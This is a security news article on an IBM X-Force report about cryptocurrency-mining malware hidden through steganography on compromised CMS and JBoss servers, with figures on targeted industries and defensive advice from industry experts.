Don't turn your infrastructure into a goldmine for others
Don't turn your infrastructure into a goldmine for others

There has been a steep increase in the number of cryptocurrency mining tools used in cyber-attacks, according to a new research report by IBM's X-Force.

According to the research, malware containing cryptocurrency mining tools have started to centre on the enterprise networks and CPU mining. It said that these tools were hidden within fake image files, a technique known as steganography, hosted on compromised web servers running Joomla or WordPress, or stored on compromised JBoss Application Servers.

Researchers said that hackers attempted to mine CryptoNote-based currencies such as Monero (XMR), which employs the CryptoNight mining algorithm.

“Command injection (CMDi) attacks, detected by IBM Security's managed intrusion detection and prevention system (IDPS) service during the attacks were trying to plant the malicious images on victims' machines using WGET and CURL shell commands when victims simply visited the page via a link in an email or through visiting a compromised site,” said researchers.

There are two possible ways attacks can be launched, noted researchers. First, the attackers scanned for already compromised CMS and then conducted the CMDi (Command injection) attack. Second, cyber-criminals performed both the initial compromise of the web resource and the subsequent CMDi attack.

Figures released by IBM showed that manufacturing and financial services were the most targeted, followed by arts and entertainment, information and communication technology, and retail.

“The reason why certain industries were targeted over others is not easily explained. Although we have not identified any specific tools being used to scan for weaknesses in these platforms, we understand that it is a prerequisite in the exploitation of this attack type. Attackers are likely targeting industries with the most vulnerable targets versus those that offer some type of advantage in terms of mining virtual currency,” said the researchers.

The report added that the latest miners go after CPUs as attackers can't count on everyone running GPUs. 

“They realise there is a large number of potential targets that are not utilising GPUs. Most mainstream computers use integrated graphics processors (IGP), which consume less power and are much cheaper. However, they are much slower than GPUs. IGPs are built into the computer motherboard, whereas GPUs are optional add-on hardware that have much higher power requirements,” said researchers.

Researchers also noted that the CryptoNight mining algorithm employed by CryptoNote-based currency is designed for mining on CPUs and can be efficiently tasked to billions of existing devices (any modern x86 CPU). However, a new mining tool called Claymore's Cryptonight GPU Miner was developed to leverage both GPUs and CPUs.

Researchers said that to shut down the virtual mint trying to form on the infrastructure organisations protect, applying standard security precautions is the top priority.

“Creating a one-stop shopping solution for preventing miners from being executed in your environment is almost impossible because so many variables exist. Focus on your network specifics and take every precaution to identify and lock down the applicable entry points of malware and miners alike,” they said.

Josh Mayfield, platform specialist, Immediate Insight at FireMon, told SC Media UK that in order to prevent these kinds of attacks, organisations should start with a good understanding of the critical components of the assets under management. 

“Often, this comes in the form of a Configuration Management Database (CMDB), which serves as a directory for all the IT assets within the organisation,” he said.

“Just as directories like Active Directory and LDAP have essential details about users, a CMDB is our single-source-of-truth for IT assets.  Signifying where GPUs reside with the assets is the first step to understanding your vulnerabilities.”

Pascal Geenens, Radware EMEA security evangelist, told SC Media UK that what worries him most is the emerging use of crypto-mining through browsers.

“A hacker poisoning CDNs to distributed crypto-mining capabilities for browsers can steal CPU cycles of many users without them even noticing. Not immediately a security breach or direct risk, but I don't feel comfortable with the idea and I do not have much to detect or protect me from it,” he said.